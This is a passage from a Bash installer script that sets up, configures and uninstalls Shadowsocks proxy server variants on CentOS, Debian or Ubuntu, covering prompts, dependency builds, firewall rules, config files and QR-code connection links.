download "${shadowsocks_libev_file}.tar.gz" "${shadowsocks_libev_url}"
if check_sys packageManager yum; then
download "${shadowsocks_libev_init}" "${shadowsocks_libev_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_libev_init}" "${shadowsocks_libev_debian}"
fi
fi
}
# Read a single keypress from the terminal without echoing it, then restore
# the original tty settings.
get_char(){
SAVEDSTTY=$(stty -g)
stty -echo
stty cbreak
dd if=/dev/tty bs=1 count=1 2> /dev/null
stty -raw
stty echo
stty "$SAVEDSTTY"
}
# error_detect_depends "MGR -y install PKG" — run the given install command
# quietly; on failure report the package name (4th word of the command) and
# abort the installer.
error_detect_depends(){
local command=$1
local depend
depend=$(echo "${command}" | awk '{print $4}')
echo -e "[${green}Info${plain}] Starting to install package ${depend}"
${command} > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Failed to install ${red}${depend}${plain}"
echo 'Please visit: https://teddysun.com/486.html and contact.'
exit 1
fi
}
# Open ${shadowsocksport} (tcp+udp): iptables on CentOS 6, firewalld on
# CentOS 7; warn instead of failing when neither service is running.
config_firewall(){
if centosversion 6; then
/etc/init.d/iptables status > /dev/null 2>&1
if [ $? -eq 0 ]; then
# only add rules when the port is not already present
iptables -L -n | grep -i "${shadowsocksport}" > /dev/null 2>&1
if [ $? -ne 0 ]; then
iptables -I INPUT -m state --state NEW -m tcp -p tcp --dport "${shadowsocksport}" -j ACCEPT
iptables -I INPUT -m state --state NEW -m udp -p udp --dport "${shadowsocksport}" -j ACCEPT
/etc/init.d/iptables save
/etc/init.d/iptables restart
else
echo -e "[${green}Info${plain}] port ${green}${shadowsocksport}${plain} already be enabled."
fi
else
echo -e "[${yellow}Warning${plain}] iptables looks like not running or not installed, please enable port ${shadowsocksport} manually if necessary."
fi
elif centosversion 7; then
systemctl status firewalld > /dev/null 2>&1
if [ $? -eq 0 ]; then
default_zone=$(firewall-cmd --get-default-zone)
firewall-cmd --permanent --zone="${default_zone}" --add-port="${shadowsocksport}"/tcp
firewall-cmd --permanent --zone="${default_zone}" --add-port="${shadowsocksport}"/udp
firewall-cmd --reload
else
echo -e "[${yellow}Warning${plain}] firewalld looks like not running or not installed, please enable port ${shadowsocksport} manually if necessary."
fi
fi
}
# Write the server config JSON for the chosen flavor, creating the config
# directory first. Values come from the interactive install_prepare_* steps
# (${shadowsocksport}, ${shadowsockspwd}, ${shadowsockscipher}, ...).
config_shadowsocks(){
if [ "${selected}" == '1' ]; then
if [ ! -d "$(dirname ${shadowsocks_python_config})" ]; then
mkdir -p $(dirname ${shadowsocks_python_config})
fi
cat > ${shadowsocks_python_config}<<-EOF
{
"server":"0.0.0.0",
"server_port":${shadowsocksport},
"local_address":"127.0.0.1",
"local_port":1080,
"password":"${shadowsockspwd}",
"timeout":300,
"method":"${shadowsockscipher}",
"fast_open":false
}
EOF
elif [ "${selected}" == '2' ]; then
if [ ! -d "$(dirname ${shadowsocks_r_config})" ]; then
mkdir -p $(dirname ${shadowsocks_r_config})
fi
cat > ${shadowsocks_r_config}<<-EOF
{
"server":"0.0.0.0",
"server_ipv6":"::",
"server_port":${shadowsocksport},
"local_address":"127.0.0.1",
"local_port":1080,
"password":"${shadowsockspwd}",
"timeout":120,
"method":"${shadowsockscipher}",
"protocol":"${shadowsockprotocol}",
"protocol_param":"",
"obfs":"${shadowsockobfs}",
"obfs_param":"",
"redirect":"",
"dns_ipv6":false,
"fast_open":false,
"workers":1
}
EOF
elif [ "${selected}" == '3' ]; then
if [ ! -d "$(dirname ${shadowsocks_go_config})" ]; then
mkdir -p $(dirname ${shadowsocks_go_config})
fi
cat > ${shadowsocks_go_config}<<-EOF
{
"server":"0.0.0.0",
"server_port":${shadowsocksport},
"local_port":1080,
"password":"${shadowsockspwd}",
"method":"${shadowsockscipher}",
"timeout":300
}
EOF
elif [ "${selected}" == '4' ]; then
# libev: also listen on IPv6 when the host has working outbound IPv6
local server_value="\"0.0.0.0\""
if get_ipv6; then
server_value="[\"[::0]\",\"0.0.0.0\"]"
fi
if [ ! -d "$(dirname ${shadowsocks_libev_config})" ]; then
mkdir -p $(dirname ${shadowsocks_libev_config})
fi
# two variants: with or without the simple-obfs plugin stanza
if [ "${libev_obfs}" == 'y' ] || [ "${libev_obfs}" == 'Y' ]; then
cat > ${shadowsocks_libev_config}<<-EOF
{
"server":${server_value},
"server_port":${shadowsocksport},
"password":"${shadowsockspwd}",
"timeout":300,
"user":"nobody",
"method":"${shadowsockscipher}",
"fast_open":false,
"nameserver":"1.0.0.1",
"mode":"tcp_and_udp",
"plugin":"obfs-server",
"plugin_opts":"obfs=${shadowsocklibev_obfs}"
}
EOF
else
cat > ${shadowsocks_libev_config}<<-EOF
{
"server":${server_value},
"server_port":${shadowsocksport},
"password":"${shadowsockspwd}",
"timeout":300,
"user":"nobody",
"method":"${shadowsockscipher}",
"fast_open":false,
"nameserver":"1.0.0.1",
"mode":"tcp_and_udp"
}
EOF
fi
fi
}
# Install build/runtime dependencies one at a time (via error_detect_depends
# so a failure names the offending package). On yum systems the EPEL repo is
# installed and enabled first.
install_dependencies(){
if check_sys packageManager yum; then
echo -e "[${green}Info${plain}] Checking the EPEL repository..."
if [ ! -f /etc/yum.repos.d/epel.repo ]; then
yum install -y epel-release > /dev/null 2>&1
fi
[ ! -f /etc/yum.repos.d/epel.repo ] && echo -e "[${red}Error${plain}] Install EPEL repository failed, please check it." && exit 1
[ ! "$(command -v yum-config-manager)" ] && yum install -y yum-utils > /dev/null 2>&1
[ x"$(yum-config-manager epel | grep -w enabled | awk '{print $3}')" != x'True' ] && yum-config-manager --enable epel > /dev/null 2>&1
echo -e "[${green}Info${plain}] Checking the EPEL repository complete..."
yum_depends=(
unzip gzip openssl openssl-devel gcc python python-devel python-setuptools pcre pcre-devel libtool libevent
autoconf automake make curl curl-devel zlib-devel perl perl-devel cpio expat-devel gettext-devel
libev-devel c-ares-devel git qrencode
)
for depend in ${yum_depends[@]}; do
error_detect_depends "yum -y install ${depend}"
done
elif check_sys packageManager apt; then
apt_depends=(
gettext build-essential unzip gzip python python-dev python-setuptools curl openssl libssl-dev
autoconf automake libtool gcc make perl cpio libpcre3 libpcre3-dev zlib1g-dev libev-dev libc-ares-dev git qrencode
)
apt-get -y update
for depend in ${apt_depends[@]}; do
error_detect_depends "apt-get -y install ${depend}"
done
fi
}
# Succeed when this host is supported: a yum or apt system that is not
# CentOS 5.
install_check(){
    if ! check_sys packageManager yum && ! check_sys packageManager apt; then
        return 1
    fi
    if centosversion 5; then
        return 1
    fi
    return 0
}
# Show the flavor menu and loop until a valid choice (1-4) is stored in the
# global ${selected}; aborts first when the OS is unsupported.
install_select(){
if ! install_check; then
echo -e "[${red}Error${plain}] Your OS is not supported to run it!"
echo 'Please change to CentOS 6+/Debian 7+/Ubuntu 12+ and try again.'
exit 1
fi
clear
while true
do
echo "Which Shadowsocks server you'd select:"
for ((i=1;i<=${#software[@]};i++ )); do
hint="${software[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Please enter a number (Default ${software[0]}):" selected
[ -z "${selected}" ] && selected='1'
case "${selected}" in
1|2|3|4)
echo
echo "You choose = ${software[${selected}-1]}"
echo
break
;;
*)
echo -e "[${red}Error${plain}] Please only enter a number [1-4]"
;;
esac
done
}
# Prompt for the server password into the global ${shadowsockspwd},
# defaulting to 'teddysun.com' on an empty reply.
install_prepare_password(){
    echo "Please enter password for ${software[${selected}-1]}"
    read -p '(Default password: teddysun.com):' shadowsockspwd
    if [ -z "${shadowsockspwd}" ]; then
        shadowsockspwd='teddysun.com'
    fi
    echo
    echo "password = ${shadowsockspwd}"
    echo
}
# Prompt for the listen port into the global ${shadowsocksport}; offers a
# random default in 9000-19999 and loops until a valid 1-65535 number
# without a leading zero is entered.
install_prepare_port() {
while true
do
dport=$(shuf -i 9000-19999 -n 1)
echo -e "Please enter a port for ${software[${selected}-1]} [1-65535]"
read -p "(Default port: ${dport}):" shadowsocksport
[ -z "${shadowsocksport}" ] && shadowsocksport=${dport}
# expr succeeds only when the reply is numeric
expr "${shadowsocksport}" + 1 &>/dev/null
if [ $? -eq 0 ]; then
if [ "${shadowsocksport}" -ge 1 ] && [ "${shadowsocksport}" -le 65535 ] && [ "${shadowsocksport:0:1}" != 0 ]; then
echo
echo "port = ${shadowsocksport}"
echo
break
fi
fi
echo -e "[${red}Error${plain}] Please enter a correct number [1-65535]"
done
}
# Prompt for the stream cipher into the global ${shadowsockscipher}. The
# menu shown depends on the flavor: common_ciphers for python/libev (1/4),
# r_ciphers for SSR (2, default index 2), go_ciphers for go (3). Loops until
# a number within the menu range is entered.
install_prepare_cipher(){
while true
do
echo -e "Please select stream cipher for ${software[${selected}-1]}:"
if [[ "${selected}" == '1' || "${selected}" == '4' ]]; then
for ((i=1;i<=${#common_ciphers[@]};i++ )); do
hint="${common_ciphers[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which cipher you'd select(Default: ${common_ciphers[0]}):" pick
[ -z "$pick" ] && pick=1
# expr succeeds only when the reply is numeric
expr ${pick} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$pick" -lt 1 || "$pick" -gt ${#common_ciphers[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#common_ciphers[@]}"
continue
fi
shadowsockscipher=${common_ciphers[$pick-1]}
elif [ "${selected}" == '2' ]; then
for ((i=1;i<=${#r_ciphers[@]};i++ )); do
hint="${r_ciphers[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which cipher you'd select(Default: ${r_ciphers[1]}):" pick
[ -z "$pick" ] && pick=2
expr ${pick} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$pick" -lt 1 || "$pick" -gt ${#r_ciphers[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#r_ciphers[@]}"
continue
fi
shadowsockscipher=${r_ciphers[$pick-1]}
elif [ "${selected}" == '3' ]; then
for ((i=1;i<=${#go_ciphers[@]};i++ )); do
hint="${go_ciphers[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which cipher you'd select(Default: ${go_ciphers[0]}):" pick
[ -z "$pick" ] && pick=1
expr ${pick} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$pick" -lt 1 || "$pick" -gt ${#go_ciphers[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#go_ciphers[@]}"
continue
fi
shadowsockscipher=${go_ciphers[$pick-1]}
fi
echo
echo "cipher = ${shadowsockscipher}"
echo
break
done
}
# Prompt for the SSR protocol into the global ${shadowsockprotocol}; loops
# until a number within the protocols menu range is entered.
install_prepare_protocol(){
while true
do
echo -e "Please select protocol for ${software[${selected}-1]}:"
for ((i=1;i<=${#protocols[@]};i++ )); do
hint="${protocols[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which protocol you'd select(Default: ${protocols[0]}):" protocol
[ -z "$protocol" ] && protocol=1
# expr succeeds only when the reply is numeric
expr ${protocol} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$protocol" -lt 1 || "$protocol" -gt ${#protocols[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#protocols[@]}"
continue
fi
shadowsockprotocol=${protocols[$protocol-1]}
echo
echo "protocol = ${shadowsockprotocol}"
echo
break
done
}
# Prompt for the SSR obfs plugin into the global ${shadowsockobfs}; loops
# until a number within the obfs menu range is entered.
install_prepare_obfs(){
while true
do
echo -e "Please select obfs for ${software[${selected}-1]}:"
for ((i=1;i<=${#obfs[@]};i++ )); do
hint="${obfs[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which obfs you'd select(Default: ${obfs[0]}):" r_obfs
[ -z "$r_obfs" ] && r_obfs=1
# expr succeeds only when the reply is numeric
expr ${r_obfs} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$r_obfs" -lt 1 || "$r_obfs" -gt ${#obfs[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#obfs[@]}"
continue
fi
shadowsockobfs=${obfs[$r_obfs-1]}
echo
echo "obfs = ${shadowsockobfs}"
echo
break
done
}
# Optionally enable simple-obfs for shadowsocks-libev: ask y/n into the
# global ${libev_obfs} and, on yes, pick http/tls into the global
# ${shadowsocklibev_obfs}. Skipped entirely when autoconf is too old
# (simple-obfs needs autoconf >= 2.67; CentOS 6 uses autoconf268 instead).
install_prepare_libev_obfs(){
if autoconf_version || centosversion 6; then
while true
do
echo -e "Do you want install simple-obfs for ${software[${selected}-1]}? [y/n]"
read -p '(default: n):' libev_obfs
[ -z "$libev_obfs" ] && libev_obfs=n
case "${libev_obfs}" in
y|Y|n|N)
echo
echo "You choose = ${libev_obfs}"
echo
break
;;
*)
echo -e "[${red}Error${plain}] Please only enter [y/n]"
;;
esac
done
if [ "${libev_obfs}" == 'y' ] || [ "${libev_obfs}" == 'Y' ]; then
while true
do
echo -e 'Please select obfs for simple-obfs:'
for ((i=1;i<=${#obfs_libev[@]};i++ )); do
hint="${obfs_libev[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which obfs you'd select(Default: ${obfs_libev[0]}):" r_libev_obfs
[ -z "$r_libev_obfs" ] && r_libev_obfs=1
# expr succeeds only when the reply is numeric
expr ${r_libev_obfs} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$r_libev_obfs" -lt 1 || "$r_libev_obfs" -gt ${#obfs_libev[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#obfs_libev[@]}"
continue
fi
shadowsocklibev_obfs=${obfs_libev[$r_libev_obfs-1]}
echo
echo "obfs = ${shadowsocklibev_obfs}"
echo
break
done
fi
else
echo -e "[${green}Info${plain}] autoconf version is less than 2.67, simple-obfs for ${software[${selected}-1]} installation has been skipped"
fi
}
# Run the interactive prompts appropriate for the chosen flavor, then wait
# for a keypress before the installation starts.
install_prepare(){
    case "${selected}" in
        1|3|4)
            install_prepare_password
            install_prepare_port
            install_prepare_cipher
            # only libev offers the simple-obfs add-on
            [ "${selected}" == '4' ] && install_prepare_libev_obfs
            ;;
        2)
            install_prepare_password
            install_prepare_port
            install_prepare_cipher
            install_prepare_protocol
            install_prepare_obfs
            ;;
    esac
    echo
    echo 'Press any key to start...or Press Ctrl+C to cancel'
    char=$(get_char)
}
# Build and install libsodium into /usr from the pinned tarball, unless its
# static library is already present; aborts (with cleanup) on build failure.
install_libsodium(){
if [ ! -f /usr/lib/libsodium.a ]; then
cd "${cur_dir}" || exit
download "${libsodium_file}.tar.gz" "${libsodium_url}"
tar zxf ${libsodium_file}.tar.gz
cd ${libsodium_file} || exit
./configure --prefix=/usr && make && make install
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] ${libsodium_file} install failed."
install_cleanup
exit 1
fi
else
echo -e "[${green}Info${plain}] ${libsodium_file} already installed."
fi
}
# Build and install mbedTLS into /usr from the pinned tarball, unless its
# static library is already present; aborts (with cleanup) on failure.
install_mbedtls(){
    if [ ! -f /usr/lib/libmbedtls.a ]; then
        cd "${cur_dir}" || exit
        download "${mbedtls_file}-apache.tgz" "${mbedtls_url}"
        tar xf "${mbedtls_file}"-apache.tgz
        cd "${mbedtls_file}" || exit
        # chain build and install so a failed build is not masked by the
        # install step (previously only `make ... install`'s status was checked)
        make SHARED=1 CFLAGS=-fPIC && make DESTDIR=/usr install
        if [ $? -ne 0 ]; then
            echo -e "[${red}Error${plain}] ${mbedtls_file} install failed."
            install_cleanup
            exit 1
        fi
    else
        echo -e "[${green}Info${plain}] ${mbedtls_file} already installed."
    fi
}
# Unpack and setup.py-install shadowsocks-python, then register its init
# script with chkconfig (yum) or update-rc.d (apt). The setup.py --record
# log is used later by the uninstaller. Aborts (with cleanup) on failure.
install_shadowsocks_python(){
cd "${cur_dir}" || exit
unzip -q ${shadowsocks_python_file}.zip
if [ $? -ne 0 ];then
echo -e "[${red}Error${plain}] unzip ${shadowsocks_python_file}.zip failed, please check unzip command."
install_cleanup
exit 1
fi
cd ${shadowsocks_python_file} || exit
python setup.py install --record /usr/local/shadowsocks_python.log
# success is judged by the ssserver entry point existing
if [ -f /usr/bin/ssserver ] || [ -f /usr/local/bin/ssserver ]; then
chmod +x ${shadowsocks_python_init}
local service_name
service_name=$(basename ${shadowsocks_python_init})
if check_sys packageManager yum; then
chkconfig --add "${service_name}"
chkconfig "${service_name}" on
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" defaults
fi
else
echo
echo -e "[${red}Error${plain}] ${software[0]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
}
# Unpack ShadowsocksR into /usr/local/shadowsocks and register its init
# script with chkconfig (yum) or update-rc.d (apt); success is judged by
# server.py being in place. Aborts (with cleanup) on failure.
install_shadowsocks_r(){
    cd "${cur_dir}" || exit
    tar zxf ${shadowsocks_r_file}.tar.gz
    mv ${shadowsocks_r_file}/shadowsocks /usr/local/
    if [ -f /usr/local/shadowsocks/server.py ]; then
        chmod +x ${shadowsocks_r_init}
        local service_name
        service_name=$(basename ${shadowsocks_r_init})
        if check_sys packageManager yum; then
            chkconfig --add "${service_name}"
            chkconfig "${service_name}" on
        elif check_sys packageManager apt; then
            update-rc.d -f "${service_name}" defaults
        fi
    else
        echo
        echo -e "[${red}Error${plain}] ${software[1]} install failed."
        # fix: 'visit;' -> 'visit:' to match every other flavor's message
        echo 'Please visit: https://teddysun.com/486.html and contact.'
        install_cleanup
        exit 1
    fi
}
# Decompress the prebuilt Go server binary (64- or 32-bit) into
# /usr/bin/shadowsocks-server and register its init script with chkconfig
# (yum) or update-rc.d (apt). Aborts (with cleanup) on failure.
install_shadowsocks_go(){
cd "${cur_dir}" || exit
if is_64bit; then
gzip -d ${shadowsocks_go_file_64}.gz
if [ $? -ne 0 ];then
echo -e "[${red}Error${plain}] Decompress ${shadowsocks_go_file_64}.gz failed."
install_cleanup
exit 1
fi
mv -f ${shadowsocks_go_file_64} /usr/bin/shadowsocks-server
else
gzip -d ${shadowsocks_go_file_32}.gz
if [ $? -ne 0 ];then
echo -e "[${red}Error${plain}] Decompress ${shadowsocks_go_file_32}.gz failed."
install_cleanup
exit 1
fi
mv -f ${shadowsocks_go_file_32} /usr/bin/shadowsocks-server
fi
if [ -f /usr/bin/shadowsocks-server ]; then
chmod +x /usr/bin/shadowsocks-server
chmod +x ${shadowsocks_go_init}
local service_name
service_name=$(basename ${shadowsocks_go_init})
if check_sys packageManager yum; then
chkconfig --add "${service_name}"
chkconfig "${service_name}" on
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" defaults
fi
else
echo
echo -e "[${red}Error${plain}] ${software[2]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
}
# Build and install shadowsocks-libev from the downloaded release tarball
# and register its init script with chkconfig (yum) or update-rc.d (apt).
# Aborts (with cleanup) on build failure.
install_shadowsocks_libev(){
cd "${cur_dir}" || exit
tar zxf "${shadowsocks_libev_file}".tar.gz
cd "${shadowsocks_libev_file}" || exit
./configure --disable-documentation && make && make install
if [ $? -eq 0 ]; then
chmod +x ${shadowsocks_libev_init}
local service_name
service_name=$(basename ${shadowsocks_libev_init})
if check_sys packageManager yum; then
chkconfig --add "${service_name}"
chkconfig "${service_name}" on
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" defaults
fi
else
echo
echo -e "[${red}Error${plain}] ${software[3]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
}
# When the user opted in, clone and build simple-obfs (with CentOS 6
# autoconf268 workarounds) and verify obfs-server ends up on PATH.
install_shadowsocks_libev_obfs(){
if [ "${libev_obfs}" == 'y' ] || [ "${libev_obfs}" == 'Y' ]; then
cd "${cur_dir}" || exit
git clone https://github.com/shadowsocks/simple-obfs.git
# NOTE(review): on clone failure this only echoes and keeps executing in
# the current directory — consider aborting here instead.
[ -d simple-obfs ] && cd simple-obfs || echo -e "[${red}Error:${plain}] Failed to git clone simple-obfs."
git submodule update --init --recursive
if centosversion 6; then
if [ ! "$(command -v autoconf268)" ]; then
echo -e "[${green}Info${plain}] Starting install autoconf268..."
yum install -y autoconf268 > /dev/null 2>&1 || echo -e "[${red}Error:${plain}] Failed to install autoconf268."
fi
# replace command autoreconf to autoreconf268
sed -i 's/autoreconf/autoreconf268/' autogen.sh
# replace #include <ev.h> to #include <libev/ev.h>
sed -i 's@^#include <ev.h>@#include <libev/ev.h>@' src/local.h
sed -i 's@^#include <ev.h>@#include <libev/ev.h>@' src/server.h
fi
./autogen.sh
./configure --disable-documentation
make
make install
# success is judged by obfs-server being resolvable on PATH
if [ ! "$(command -v obfs-server)" ]; then
echo -e "[${red}Error${plain}] simple-obfs for ${software[${selected}-1]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
[ -f /usr/local/bin/obfs-server ] && ln -s /usr/local/bin/obfs-server /usr/bin
fi
}
# Start the python flavor via its init script and print the connection
# summary (IP, port, password, cipher).
install_completed_python(){
clear
${shadowsocks_python_init} start
echo
echo -e "Congratulations, ${green}${software[0]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
# Start the SSR flavor via its init script and print the connection summary
# (IP, port, password, protocol, obfs, cipher).
install_completed_r(){
clear
${shadowsocks_r_init} start
echo
echo -e "Congratulations, ${green}${software[1]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
echo -e "Your Protocol : ${red} ${shadowsockprotocol} ${plain}"
echo -e "Your obfs : ${red} ${shadowsockobfs} ${plain}"
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
# Start the Go flavor via its init script and print the connection summary
# (IP, port, password, cipher).
install_completed_go(){
clear
${shadowsocks_go_init} start
echo
echo -e "Congratulations, ${green}${software[2]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
# Refresh the linker cache, start the libev flavor via its init script and
# print the connection summary (obfs line only when obfs-server exists).
install_completed_libev(){
clear
ldconfig
${shadowsocks_libev_init} start
echo
echo -e "Congratulations, ${green}${software[3]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
if [ "$(command -v obfs-server)" ]; then
echo -e "Your obfs : ${red} ${shadowsocklibev_obfs} ${plain}"
fi
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
# Build the ss:// link (base64 of method:password@ip:port), print it, and
# render it as a PNG QR code when qrencode is available.
qr_generate_python(){
    if [ "$(command -v qrencode)" ]; then
        local payload
        payload=$(echo -n "${shadowsockscipher}:${shadowsockspwd}@$(get_ip):${shadowsocksport}" | base64 -w0)
        local link="ss://${payload}"
        echo
        echo 'Your QR Code: (For Shadowsocks Windows, OSX, Android and iOS clients)'
        echo -e "${green} ${link} ${plain}"
        echo -n "${link}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_python_qr.png
        echo 'Your QR Code has been saved as a PNG file path:'
        echo -e "${green} ${cur_dir}/shadowsocks_python_qr.png ${plain}"
    fi
}
# Build the ssr:// link (base64 of ip:port:protocol:method:obfs:pwd_b64/?obfsparam=),
# print it, and render it as a PNG QR code when qrencode is available.
qr_generate_r(){
    if [ "$(command -v qrencode)" ]; then
        # password uses URL-safe base64 without padding per the SSR link format
        local pwd_b64
        pwd_b64=$(echo -n "${shadowsockspwd}" | base64 -w0 | sed 's/=//g;s/\//_/g;s/+/-/g')
        local payload
        payload=$(echo -n "$(get_ip):${shadowsocksport}:${shadowsockprotocol}:${shadowsockscipher}:${shadowsockobfs}:${pwd_b64}/?obfsparam=" | base64 -w0)
        local link="ssr://${payload}"
        echo
        echo 'Your QR Code: (For ShadowsocksR Windows, Android clients only)'
        echo -e "${green} ${link} ${plain}"
        echo -n "${link}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_r_qr.png
        echo 'Your QR Code has been saved as a PNG file path:'
        echo -e "${green} ${cur_dir}/shadowsocks_r_qr.png ${plain}"
    fi
}
# Build the ss:// link (base64 of method:password@ip:port), print it, and
# render it as a PNG QR code when qrencode is available.
qr_generate_go(){
    if [ "$(command -v qrencode)" ]; then
        local payload
        payload=$(echo -n "${shadowsockscipher}:${shadowsockspwd}@$(get_ip):${shadowsocksport}" | base64 -w0)
        local link="ss://${payload}"
        echo
        echo 'Your QR Code: (For Shadowsocks Windows, OSX, Android and iOS clients)'
        echo -e "${green} ${link} ${plain}"
        echo -n "${link}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_go_qr.png
        echo 'Your QR Code has been saved as a PNG file path:'
        echo -e "${green} ${cur_dir}/shadowsocks_go_qr.png ${plain}"
    fi
}
# Build the ss:// link (base64 of method:password@ip:port), print it, and
# render it as a PNG QR code when qrencode is available.
qr_generate_libev(){
    if [ "$(command -v qrencode)" ]; then
        local payload
        payload=$(echo -n "${shadowsockscipher}:${shadowsockspwd}@$(get_ip):${shadowsocksport}" | base64 -w0)
        local link="ss://${payload}"
        echo
        echo 'Your QR Code: (For Shadowsocks Windows, OSX, Android and iOS clients)'
        echo -e "${green} ${link} ${plain}"
        echo -n "${link}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_libev_qr.png
        echo 'Your QR Code has been saved as a PNG file path:'
        echo -e "${green} ${cur_dir}/shadowsocks_libev_qr.png ${plain}"
    fi
}
# Install libsodium (all flavors need it), make sure /usr/lib is in the
# linker path, then run the flavor-specific install/report/QR steps.
install_main(){
install_libsodium
if ! ldconfig -p | grep -wq '/usr/lib'; then
echo '/usr/lib' > /etc/ld.so.conf.d/lib.conf
fi
ldconfig
if [ "${selected}" == '1' ]; then
install_shadowsocks_python
install_completed_python
qr_generate_python
elif [ "${selected}" == '2' ]; then
install_shadowsocks_r
install_completed_r
qr_generate_r
elif [ "${selected}" == '3' ]; then
install_shadowsocks_go
install_completed_go
qr_generate_go
elif [ "${selected}" == '4' ]; then
# libev additionally needs mbedTLS and optionally simple-obfs
install_mbedtls
install_shadowsocks_libev
install_shadowsocks_libev_obfs
install_completed_libev
qr_generate_libev
fi
echo
echo 'Welcome to visit: https://teddysun.com/486.html'
echo 'Enjoy it!'
echo
}
# Remove downloaded archives and extracted build trees from the install
# directory. All expansions are quoted consistently (the original quoted only
# some of them) so paths containing spaces or glob characters cannot be
# word-split or expanded by the shell before reaching rm.
install_cleanup(){
cd "${cur_dir}" || exit
rm -rf simple-obfs
rm -rf "${libsodium_file}" "${libsodium_file}.tar.gz"
rm -rf "${mbedtls_file}" "${mbedtls_file}-apache.tgz"
rm -rf "${shadowsocks_python_file}" "${shadowsocks_python_file}.zip"
rm -rf "${shadowsocks_r_file}" "${shadowsocks_r_file}.tar.gz"
rm -rf "${shadowsocks_go_file_64}.gz" "${shadowsocks_go_file_32}.gz"
rm -rf "${shadowsocks_libev_file}" "${shadowsocks_libev_file}.tar.gz"
}
# Top-level install pipeline: prompt for a flavour and settings, fetch and
# build it, write config/firewall rules, then clean up temporary files.
install_shadowsocks(){
disable_selinux
install_select
install_prepare
install_dependencies
download_files
config_shadowsocks
# Firewall configuration is only handled on yum-based (RHEL/CentOS) systems.
if check_sys packageManager yum; then
config_firewall
fi
install_main
install_cleanup
}
# Interactively uninstall Shadowsocks-Python: stop the daemon, deregister its
# init script, then delete config, init script, logs and installed files.
# Fixes over the original: `read -r` so backslashes in input are not mangled,
# the running-check tests the command directly instead of `$?`, expansions are
# quoted, and the useless `cat | xargs` became a redirection.
uninstall_shadowsocks_python(){
printf "Are you sure uninstall ${red}${software[0]}${plain}? [y/n]\n"
read -r -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
# Stop the daemon only if it is currently running.
if ${shadowsocks_python_init} status > /dev/null 2>&1; then
${shadowsocks_python_init} stop
fi
local service_name
service_name=$(basename "${shadowsocks_python_init}")
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr "$(dirname "${shadowsocks_python_config}")"
rm -f "${shadowsocks_python_init}"
rm -f /var/log/shadowsocks.log
# The install manifest lists every file setup.py copied; remove them all.
if [ -f /usr/local/shadowsocks_python.log ]; then
xargs rm -rf < /usr/local/shadowsocks_python.log
rm -f /usr/local/shadowsocks_python.log
fi
echo -e "[${green}Info${plain}] ${software[0]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[0]} uninstall cancelled, nothing to do..."
echo
fi
}
# Interactively uninstall ShadowsocksR: stop the daemon, deregister its init
